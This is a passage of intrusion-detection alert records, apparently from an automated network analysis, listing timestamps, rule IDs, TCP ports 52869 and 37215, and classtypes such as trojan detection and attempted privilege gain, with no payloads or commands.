                      Timestamp:07/20/24-23:06:04.439088
                      SID:2831300
                      Source Port:53798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.449068
                      SID:2831300
                      Source Port:46940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.486141
                      SID:2027339
                      Source Port:56316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.996850
                      SID:2025132
                      Source Port:36260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.627537
                      SID:2027339
                      Source Port:59274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.826893
                      SID:2025132
                      Source Port:37426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.795527
                      SID:2835222
                      Source Port:34402
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.400252
                      SID:2025132
                      Source Port:55988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.542495
                      SID:2831300
                      Source Port:48974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.057513
                      SID:2831300
                      Source Port:52980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:21.718589
                      SID:2027339
                      Source Port:42208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.853915
                      SID:2025132
                      Source Port:44594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.159827
                      SID:2027339
                      Source Port:36952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.001304
                      SID:2027339
                      Source Port:36880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.528919
                      SID:2835222
                      Source Port:35434
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.827265
                      SID:2831300
                      Source Port:33512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:11.328788
                      SID:2025132
                      Source Port:44640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.332122
                      SID:2831300
                      Source Port:47958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.465472
                      SID:2831300
                      Source Port:54204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.374064
                      SID:2027339
                      Source Port:56186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.036645
                      SID:2027339
                      Source Port:53608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.357839
                      SID:2831300
                      Source Port:56734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.459218
                      SID:2027339
                      Source Port:39852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.771024
                      SID:2025132
                      Source Port:48184
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:44.686584
                      SID:2831300
                      Source Port:45358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.260147
                      SID:2025132
                      Source Port:35044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.525575
                      SID:2831300
                      Source Port:40400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:48.642445
                      SID:2027339
                      Source Port:40836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.102064
                      SID:2027339
                      Source Port:33846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.698381
                      SID:2027339
                      Source Port:41428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.070646
                      SID:2025132
                      Source Port:52872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.485640
                      SID:2831300
                      Source Port:57984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.513067
                      SID:2027339
                      Source Port:54620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.188540
                      SID:2025132
                      Source Port:54476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.167111
                      SID:2831300
                      Source Port:53530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.460621
                      SID:2025132
                      Source Port:51636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.028397
                      SID:2027339
                      Source Port:39398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.395096
                      SID:2027339
                      Source Port:40524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.061994
                      SID:2027339
                      Source Port:55016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.883252
                      SID:2027339
                      Source Port:49392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.413410
                      SID:2027339
                      Source Port:36098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.141104
                      SID:2831300
                      Source Port:53910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.234632
                      SID:2025132
                      Source Port:34100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.625708
                      SID:2829579
                      Source Port:37880
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.648686
                      SID:2027339
                      Source Port:56012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.170667
                      SID:2027339
                      Source Port:57672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.624854
                      SID:2835222
                      Source Port:56584
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.320571
                      SID:2025132
                      Source Port:46282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:12.617233
                      SID:2027339
                      Source Port:51644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.312437
                      SID:2025132
                      Source Port:51998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.192985
                      SID:2027339
                      Source Port:39678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.652415
                      SID:2025132
                      Source Port:35892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.553922
                      SID:2025132
                      Source Port:50118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.747656
                      SID:2829579
                      Source Port:51562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.558741
                      SID:2027339
                      Source Port:34168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.174966
                      SID:2025132
                      Source Port:58288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.205784
                      SID:2027339
                      Source Port:57124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.927271
                      SID:2025132
                      Source Port:54486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:21.718589
                      SID:2027339
                      Source Port:43462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.414364
                      SID:2025132
                      Source Port:59770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.442221
                      SID:2831300
                      Source Port:43664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:14.645434
                      SID:2027339
                      Source Port:49250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.947686
                      SID:2027339
                      Source Port:46342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.437584
                      SID:2835222
                      Source Port:54366
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.797060
                      SID:2025132
                      Source Port:52640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.555898
                      SID:2835222
                      Source Port:41324
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.531088
                      SID:2831300
                      Source Port:60664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.830570
                      SID:2829579
                      Source Port:47186
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.580139
                      SID:2829579
                      Source Port:54258
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245589
                      SID:2835222
                      Source Port:46080
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:30.428451
                      SID:2027339
                      Source Port:40094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.037609
                      SID:2025132
                      Source Port:56454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.574959
                      SID:2835222
                      Source Port:44520
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.002874
                      SID:2025132
                      Source Port:45604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:15.422064
                      SID:2027339
                      Source Port:58786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.542495
                      SID:2831300
                      Source Port:49442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.543285
                      SID:2025132
                      Source Port:55030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.515632
                      SID:2831300
                      Source Port:41090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:19.491493
                      SID:2831300
                      Source Port:48494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.299648
                      SID:2027339
                      Source Port:38074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.476168
                      SID:2027339
                      Source Port:52054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.013524
                      SID:2027339
                      Source Port:46868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.853581
                      SID:2027339
                      Source Port:43132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.862638
                      SID:2027339
                      Source Port:40720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.813486
                      SID:2027339
                      Source Port:52498
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:56.125524
                      SID:2025132
                      Source Port:43998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.160489
                      SID:2025132
                      Source Port:56258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.993689
                      SID:2831300
                      Source Port:33462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.450231
                      SID:2025132
                      Source Port:35802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.477436
                      SID:2025132
                      Source Port:41364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.830981
                      SID:2831300
                      Source Port:40930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.195412
                      SID:2025132
                      Source Port:44296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:29.663319
                      SID:2025132
                      Source Port:35264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:12.943129
                      SID:2831300
                      Source Port:55870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:04.676388
                      SID:2027339
                      Source Port:47900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.873559
                      SID:2027339
                      Source Port:55554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.745128
                      SID:2027339
                      Source Port:47388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.965613
                      SID:2831300
                      Source Port:50628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.415063
                      SID:2025132
                      Source Port:52774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.164914
                      SID:2831300
                      Source Port:42972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.464031
                      SID:2027339
                      Source Port:36538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.571555
                      SID:2835222
                      Source Port:38744
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.034671
                      SID:2027339
                      Source Port:59160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.725561
                      SID:2027339
                      Source Port:58864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.489725
                      SID:2831300
                      Source Port:49076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.780090
                      SID:2835222
                      Source Port:39178
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.334876
                      SID:2831300
                      Source Port:43658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.613195
                      SID:2025132
                      Source Port:44318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.445659
                      SID:2831300
                      Source Port:39660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.114018
                      SID:2831300
                      Source Port:57476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.668564
                      SID:2025132
                      Source Port:52158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.422743
                      SID:2025132
                      Source Port:36270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:38.067768
                      SID:2027339
                      Source Port:43384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.559457
                      SID:2027339
                      Source Port:55664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.137205
                      SID:2829579
                      Source Port:42268
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.424976
                      SID:2829579
                      Source Port:32968
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.439166
                      SID:2829579
                      Source Port:53286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.047734
                      SID:2835222
                      Source Port:40502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.066021
                      SID:2027339
                      Source Port:55762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.858199
                      SID:2835222
                      Source Port:35336
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.630378
                      SID:2027339
                      Source Port:47188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.972089
                      SID:2831300
                      Source Port:60344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:33.411817
                      SID:2025132
                      Source Port:35976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:25.934160
                      SID:2025132
                      Source Port:59078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.099074
                      SID:2027339
                      Source Port:59138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.330485
                      SID:2027339
                      Source Port:41496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.761892
                      SID:2025132
                      Source Port:35230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.402098
                      SID:2835222
                      Source Port:55778
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.013302
                      SID:2831300
                      Source Port:54346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:22.097094
                      SID:2025132
                      Source Port:44064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:34.302136
                      SID:2027339
                      Source Port:46626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.805275
                      SID:2831300
                      Source Port:42910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.203133
                      SID:2025132
                      Source Port:46238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.976833
                      SID:2831300
                      Source Port:33294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:06.090759
                      SID:2027339
                      Source Port:41044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.112950
                      SID:2025132
                      Source Port:39520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.507455
                      SID:2027339
                      Source Port:34118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.435340
                      SID:2027339
                      Source Port:43702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.039093
                      SID:2829579
                      Source Port:46274
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.133891
                      SID:2027339
                      Source Port:35378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.812461
                      SID:2027339
                      Source Port:39452
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.123864
                      SID:2831300
                      Source Port:36806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.851101
                      SID:2027339
                      Source Port:50756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.842190
                      SID:2831300
                      Source Port:38212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.125247
                      SID:2027339
                      Source Port:40168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.457748
                      SID:2831300
                      Source Port:39574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.391419
                      SID:2027339
                      Source Port:45958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.329793
                      SID:2829579
                      Source Port:55000
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.475548
                      SID:2027339
                      Source Port:45614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.534062
                      SID:2027339
                      Source Port:32842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.765891
                      SID:2829579
                      Source Port:38602
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.086589
                      SID:2831300
                      Source Port:41100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.048572
                      SID:2025132
                      Source Port:35882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.524010
                      SID:2829579
                      Source Port:53326
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.084046
                      SID:2027339
                      Source Port:60122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.762153
                      SID:2835222
                      Source Port:57568
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:06.909872
                      SID:2025132
                      Source Port:44802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.780090
                      SID:2835222
                      Source Port:39826
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.542034
                      SID:2835222
                      Source Port:40512
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.345104
                      SID:2831300
                      Source Port:55320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.175839
                      SID:2027339
                      Source Port:60860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.446227
                      SID:2835222
                      Source Port:36230
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.046089
                      SID:2027339
                      Source Port:41954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.677347
                      SID:2025132
                      Source Port:33756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.359038
                      SID:2027339
                      Source Port:49330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.471777
                      SID:2027339
                      Source Port:48216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.256522
                      SID:2025132
                      Source Port:37820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:37.923474
                      SID:2025132
                      Source Port:45400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:34.395125
                      SID:2025132
                      Source Port:58622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.861759
                      SID:2829579
                      Source Port:49430
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.525575
                      SID:2831300
                      Source Port:55816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:37.787409
                      SID:2027339
                      Source Port:46140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.333807
                      SID:2027339
                      Source Port:34484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.939891
                      SID:2835222
                      Source Port:51892
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.392392
                      SID:2831300
                      Source Port:42464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.017539
                      SID:2831300
                      Source Port:59688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.416273
                      SID:2027339
                      Source Port:58618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.486069
                      SID:2027339
                      Source Port:58300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.889934
                      SID:2831300
                      Source Port:48000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.494675
                      SID:2831300
